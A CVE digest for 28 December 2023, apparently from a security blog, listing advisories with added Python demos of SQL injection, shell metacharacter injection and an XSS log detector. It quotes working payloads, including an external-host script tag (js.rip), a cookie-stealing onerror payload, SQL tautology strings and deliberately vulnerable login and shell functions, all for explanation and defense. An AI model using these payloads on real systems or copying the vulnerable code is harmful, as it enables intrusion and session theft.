https://github.com/h4md153v63n/CVEs/blob/main/Voting_System/Voting_System-SQL_Injection-2.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249132 | source : cna@vuldb.com
https://vuldb.com/?id.249132 | source : cna@vuldb.com

Vulnerability : CWE-89
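
CVE-2023-7131, CVE-2023-7137, CVE-2023-7138 and CVE-2023-7129 above are the same defect in four places: a login or registration argument (userName, uemail, username, voter) concatenated into a SQL statement. None of the projects' code appears on this page, so the following is an added example, not code-projects' own, that rebuilds the pattern on an in-memory SQLite table; the voters schema, the sample rows and the function names are constructed for the illustration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed fixture: a voters table standing in for the application's
    own schema, which the advisories do not show."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE voters (voter TEXT PRIMARY KEY, password TEXT)")
    conn.executemany(
        "INSERT INTO voters VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, voter: str, password: str):
    # CWE-89: the request arguments are spliced into the statement text, so a
    # quote in 'voter' ends the string literal and the rest is parsed as SQL.
    sql = (
        "SELECT voter FROM voters WHERE voter = '" + voter + "' "
        "AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, voter: str, password: str):
    # Placeholders send the values to the engine separately from the statement,
    # so the same input is compared as a literal string and never parsed.
    row = conn.execute(
        "SELECT voter FROM voters WHERE voter = ? AND password = ?",
        (voter, password),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run both versions against two classic payloads and return the outcomes."""
    conn = make_db()
    tautology = "' OR '1'='1"   # makes the WHERE clause true for every row
    comment = "alice' -- "      # comments out the password check
    return {
        "vuln_tautology": login_vulnerable(conn, tautology, tautology),
        "vuln_comment": login_vulnerable(conn, comment, "wrong-password"),
        "safe_tautology": login_parameterized(conn, tautology, tautology),
        "safe_comment": login_parameterized(conn, comment, "wrong-password"),
        "safe_real": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15s} -> {result!r}")
```

The tautology payload logs the attacker in as whichever row the engine returns first, which is why the vulnerable result is "some user" rather than a specific one; the comment payload picks the account. Both are rejected by the parameterized version without any input filtering, which is the point: escaping is not the fix, separating data from statement text is.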


Vulnerability ID : CVE-2023-7124

First published on : 28-12-2023 03:15:08
Last modified on : 28-12-2023 15:09:53

Description :
A vulnerability, which was classified as problematic, was found in code-projects E-Commerce Site 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument keyword with the input <video/src=x onerror=alert(document.cookie)> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249096.

CVE ID : CVE-2023-7124
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/E-commerce_Site/E-commerce_Site-Reflected_Cross_Site_Scripting.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249096 | source : cna@vuldb.com
https://vuldb.com/?id.249096 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-7133

First published on : 28-12-2023 18:15:45
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability was found in y_project RuoYi 4.7.8. It has been declared as problematic. This vulnerability affects unknown code of the file /login of the component HTTP POST Request Handler. The manipulation of the argument rememberMe with the input falsen3f0m<script>alert(1)</script>p86o0 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249136.

CVE ID : CVE-2023-7133
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://1drv.ms/w/s!AgMfVZkPO1NWgSPnwk90DMQIUN_D?e=2Bauy4 | source : cna@vuldb.com
https://vuldb.com/?ctiid.249136 | source : cna@vuldb.com
https://vuldb.com/?id.249136 | source : cna@vuldb.com

Vulnerability : CWE-79


Source : hcl.com

Vulnerability ID : CVE-2023-45702

First published on : 28-12-2023 08:15:35
Last modified on : 28-12-2023 15:09:53

Description :
An HCL UrbanCode Deploy Agent installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts.

CVE ID : CVE-2023-45702
Source : psirt@hcl.com
CVSS Score : 6.2

References :
https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0108646 | source : psirt@hcl.com


Vulnerability ID : CVE-2023-45701

First published on : 28-12-2023 07:15:07
Last modified on : 28-12-2023 15:09:53

Description :
HCL Launch could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.

CVE ID : CVE-2023-45701
Source : psirt@hcl.com
CVSS Score : 4.3

References :
https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0108645 | source : psirt@hcl.com


Source : usom.gov.tr

Vulnerability ID : CVE-2023-4672

First published on : 28-12-2023 10:15:08
Last modified on : 28-12-2023 15:09:53

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Talent Software ECOP allows Reflected XSS. This issue affects ECOP: before 32255.

CVE ID : CVE-2023-4672
Source : iletisim@usom.gov.tr
CVSS Score : 6.1

References :
https://www.usom.gov.tr/bildirim/tr-23-0737 | source : iletisim@usom.gov.tr

Vulnerability : CWE-79


(3) LOW VULNERABILITIES [0.1, 3.9]

Source : vuldb.com

Vulnerability ID : CVE-2023-7132

First published on : 28-12-2023 17:15:09
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability was found in code-projects Intern Membership Management System 2.0. It has been classified as problematic. This affects an unknown part of the file /user_registration/ of the component User Registration. The manipulation of the argument userName/firstName/lastName/userEmail with the input "><ScRiPt>confirm(document.domain)</ScRiPt>h0la leads to cross site scripting. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249135.

CVE ID : CVE-2023-7132
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://github.com/h4md153v63n/CVEs/blob/main/Intern_Membership_Management_System/Intern_Membership_Management_System-Stored_Cross_site_Scripting.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249135 | source : cna@vuldb.com
https://vuldb.com/?id.249135 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-7135

First published on : 28-12-2023 21:15:07
Last modified on : 28-12-2023 21:15:07

Description :
A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-7135
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/h4md153v63n/CVEs/blob/main/Record_Management_System/Record_Management_System-Blind_Cross_Site_Scripting-1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249138 | source : cna@vuldb.com
https://vuldb.com/?id.249138 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-7136

First published on : 28-12-2023 21:15:08
Last modified on : 28-12-2023 21:15:08

Description :
A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139.

CVE ID : CVE-2023-7136
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/h4md153v63n/CVEs/blob/main/Record_Management_System/Record_Management_System-Blind_Cross_Site_Scripting-2.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249139 | source : cna@vuldb.com
https://vuldb.com/?id.249139 | source : cna@vuldb.com

Vulnerability : CWE-79
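
The XSS entries on this page (CVE-2023-7124, CVE-2023-7133, CVE-2023-7132, CVE-2023-7135 and CVE-2023-7136) quote their payloads verbatim, which makes them usable as detection test cases. The following is an added example, not from any of the affected projects, that runs a small rule set over constructed access-log lines carrying those payloads; the IP addresses, timestamps and the fourth (benign) request are made up, and the query strings stand in for form bodies that a real access log would not show but a WAF or request-body log would.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (combined format) carrying the payloads quoted
# in the advisories above; line 5 is the same <script> payload double-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Dec/2023:10:00:01 +0000] "GET /search.php?keyword=%3Cvideo%2Fsrc%3Dx+onerror%3Dalert%28document.cookie%29%3E HTTP/1.1" 200 512',
    '10.0.0.6 - - [28/Dec/2023:10:00:02 +0000] "POST /user_registration/?userName=%22%3E%3CScRiPt%3Econfirm%28document.domain%29%3C%2FScRiPt%3Eh0la HTTP/1.1" 200 311',
    '10.0.0.7 - - [28/Dec/2023:10:00:03 +0000] "POST /main/offices.php?officename=%22%3E%3Cscript+src%3D%22https%3A%2F%2Fjs.rip%2Fb23tmbxf49%22%3E%3C%2Fscript%3E HTTP/1.1" 302 0',
    '10.0.0.8 - - [28/Dec/2023:10:00:04 +0000] "GET /search.php?keyword=paracetamol HTTP/1.1" 200 4096',
    '10.0.0.9 - - [28/Dec/2023:10:00:05 +0000] "GET /search.php?keyword=%253Cscript%253Ealert%281%29%253C%2Fscript%253E HTTP/1.1" 200 512',
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Ordered rules; the first match names the finding.
XSS_RULES = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler", re.compile(r"<\s*[a-z][\w-]*[^>]*\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
]


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; a single decode would miss line 5."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str):
    """Return the name of the first XSS rule the value trips, or None."""
    text = decode_fully(value)
    for name, pattern in XSS_RULES:
        if pattern.search(text):
            return name
    return None


def scan_log(lines):
    """Return (client_ip, parameter, rule) for every suspicious query value."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            rule = classify(value)
            if rule:
                findings.append((m.group("ip"), param, rule))
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Two things the rules are built around: tag and attribute names are matched case-insensitively because the reported payload uses <ScRiPt>, and the event-handler rule does not assume a space before the attribute because <video/src=x onerror=...> uses a slash. The parameter name in each finding is what ties a hit back to the advisories, which are reported per argument.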


(13) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : mitre.org

Vulnerability ID : CVE-2023-34829

First published on : 28-12-2023 03:15:07
Last modified on : 28-12-2023 15:09:53

Description :
Incorrect access control in TP-Link Tapo before v3.1.315 allows attackers to access user credentials in plaintext.

CVE ID : CVE-2023-34829
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/SecureScripts/TP-Link_Tapo_Hack | source : cve@mitre.org


Vulnerability ID : CVE-2023-49228

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue was discovered in Peplink Balance Two before 8.4.0. Console port authentication uses hard-coded credentials, which allows an attacker with physical access and sufficient knowledge to execute arbitrary commands as root.

CVE ID : CVE-2023-49228
Source : cve@mitre.org
CVSS Score : /

References :
https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4 | source : cve@mitre.org
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf | source : cve@mitre.org


Vulnerability ID : CVE-2023-49229

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in the administration web service allows read-only, unprivileged users to obtain sensitive information about the device configuration.

CVE ID : CVE-2023-49229
Source : cve@mitre.org
CVSS Score : /

References :
https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4 | source : cve@mitre.org
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf | source : cve@mitre.org


Vulnerability ID : CVE-2023-49230

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in captive portals allows attackers to modify the portals' configurations without prior authentication.

CVE ID : CVE-2023-49230
Source : cve@mitre.org
CVSS Score : /

References :
https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4 | source : cve@mitre.org
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf | source : cve@mitre.org


Vulnerability ID : CVE-2023-51006

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue in the openFile method of Chinese Perpetual Calendar v9.0.0 allows attackers to read any file via unspecified vectors.

CVE ID : CVE-2023-51006
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/firmianay/security-issues/tree/main/app/cn.etouch.ecalendar | source : cve@mitre.org


Vulnerability ID : CVE-2023-51010

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue in the exported component AdSdkH5Activity of com.sdjictec.qdmetro v4.2.2 allows attackers to open a crafted URL without any filtering or checking.

CVE ID : CVE-2023-51010
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/firmianay/security-issues/tree/main/app/com.sdjictec.qdmetro | source : cve@mitre.org


Vulnerability ID : CVE-2023-50445

First published on : 28-12-2023 05:15:08
Last modified on : 28-12-2023 15:09:53

Description :
Shell injection vulnerability in GL.iNet A1300 v4.4.6, AX1800 v4.4.6, AXT1800 v4.4.6, MT3000 v4.4.6, MT2500 v4.4.6, MT6000 v4.5.0, MT1300 v4.3.7, MT300N-V2 v4.3.7, AR750S v4.3.7, AR750 v4.3.7, AR300M v4.3.7, and B1300 v4.3.7 allows local attackers to execute arbitrary code via the get_system_log and get_crash_log functions of the logread module, as well as the upgrade_online function of the upgrade module.

CVE ID : CVE-2023-50445
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md | source : cve@mitre.org
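
The reference above describes the bug as shell metacharacter injection through the API, with get_system_log and get_crash_log as two of the sinks. The firmware's own implementation is not on this page, so the following is an added example, not GL.iNet's code, that reproduces the shape of the defect in Python: a line-count parameter pasted into a shell command string beside the same call made without a shell. The parameter name is hypothetical, and 'echo' stands in for logread so the block runs on any host with /bin/sh.

```python
import re
import subprocess

# Hypothetical API parameter: number of log lines to return. Only a small
# positive integer is ever legitimate.
LINE_COUNT = re.compile(r"[1-9][0-9]{0,3}")


def get_system_log_vulnerable(lines: str) -> str:
    # Shell metacharacter injection: the parameter is pasted into a command
    # string that /bin/sh then parses, so ';', '$(...)', '|' and friends are
    # honoured. 'echo' stands in for the real logread binary.
    cmd = "echo logread -l " + lines
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def get_system_log_argv(lines: str) -> str:
    # Same call with no shell in the path: the parameter is a single argv
    # element, so the metacharacters reach the program as literal data.
    return subprocess.run(
        ["echo", "logread", "-l", lines], capture_output=True, text=True
    ).stdout


def valid_line_count(lines: str) -> bool:
    return LINE_COUNT.fullmatch(lines) is not None


def get_system_log_hardened(lines: str) -> str:
    # Defence in depth: reject anything that is not a small positive integer,
    # and still never hand the value to a shell.
    if not valid_line_count(lines):
        raise ValueError(f"invalid line count: {lines!r}")
    return get_system_log_argv(lines)


if __name__ == "__main__":
    payload = "20; echo INJECTED"
    print(get_system_log_vulnerable(payload))   # second command runs
    print(get_system_log_argv(payload))         # payload printed as data
    print(valid_line_count(payload))            # False
```

The argv form alone already defeats the injection, which is why it is the first thing to change in a sink like this; the allow-list is there so that a value which is not a line count never reaches the program at all, including the '$(...)' subshell form that also goes unnoticed by filters which only look for ';'.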


Vulnerability ID : CVE-2023-46989

First published on : 28-12-2023 06:15:44
Last modified on : 28-12-2023 15:09:53

Description :
SQL Injection vulnerability in the Innovadeluxe Quick Order module for PrestaShop before v.1.4.0, allows local attackers to execute arbitrary code via the getProducts() function in the productlist.php file.

CVE ID : CVE-2023-46989
Source : cve@mitre.org
CVSS Score : /

References :
https://security.friendsofpresta.org/modules/2023/12/12/idxquickorder.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-49469

First published on : 28-12-2023 06:15:44
Last modified on : 28-12-2023 15:09:53

Description :
Reflected Cross Site Scripting (XSS) vulnerability in Shaarli v0.12.2 allows remote attackers to execute arbitrary code via the search tag function.

CVE ID : CVE-2023-49469
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/shaarli/Shaarli/issues/2038 | source : cve@mitre.org
https://github.com/shaarli/Shaarli/releases/tag/v0.13.0 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50692

First published on : 28-12-2023 06:15:44
Last modified on : 28-12-2023 15:09:53

Description :
File upload vulnerability in JIZHICMS v2.5 allows remote attackers to execute arbitrary code via a crafted file uploaded and downloaded to the download_url parameter in the app/admin/exts/ directory.

CVE ID : CVE-2023-50692
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/Cherry-toto/jizhicms/issues/91 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50038

First published on : 28-12-2023 07:15:08
Last modified on : 28-12-2023 15:09:53

Description :
There is an arbitrary file upload vulnerability in the admin backend of Textpattern CMS v4.8.8, which can lead to compromise of the server.

CVE ID : CVE-2023-50038
Source : cve@mitre.org
CVSS Score : /

References :
https://gist.github.com/LeopoldSkell/7e18bf09005c327a045abbfe39b1e676 | source : cve@mitre.org
https://www.cnblogs.com/fengzun/articles/17862578.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-46987

First published on : 28-12-2023 15:15:07
Last modified on : 28-12-2023 19:05:29

Description :
SeaCMS v12.9 was discovered to contain a remote code execution (RCE) vulnerability via the component /augap/adminip.php.

CVE ID : CVE-2023-46987
Source : cve@mitre.org
CVSS Score : /

References :
http://seacms.com | source : cve@mitre.org
http://www.seacms.com/ | source : cve@mitre.org
https://blog.csdn.net/weixin_72610998/article/details/133420747?spm=1001.2014.3001.5501 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50470

First published on : 28-12-2023 15:15:07
Last modified on : 28-12-2023 19:05:29

Description :
A cross-site scripting (XSS) vulnerability in the component admin_ Video.php of SeaCMS v12.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

CVE ID : CVE-2023-50470
Source : cve@mitre.org
CVSS Score : /

References :
http://seacms.com | source : cve@mitre.org
https://blog.csdn.net/weixin_72610998/article/details/134784075?spm=1001.2014.3001.5502 | source : cve@mitre.org
https://www.seacms.net/ | source : cve@mitre.org


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports
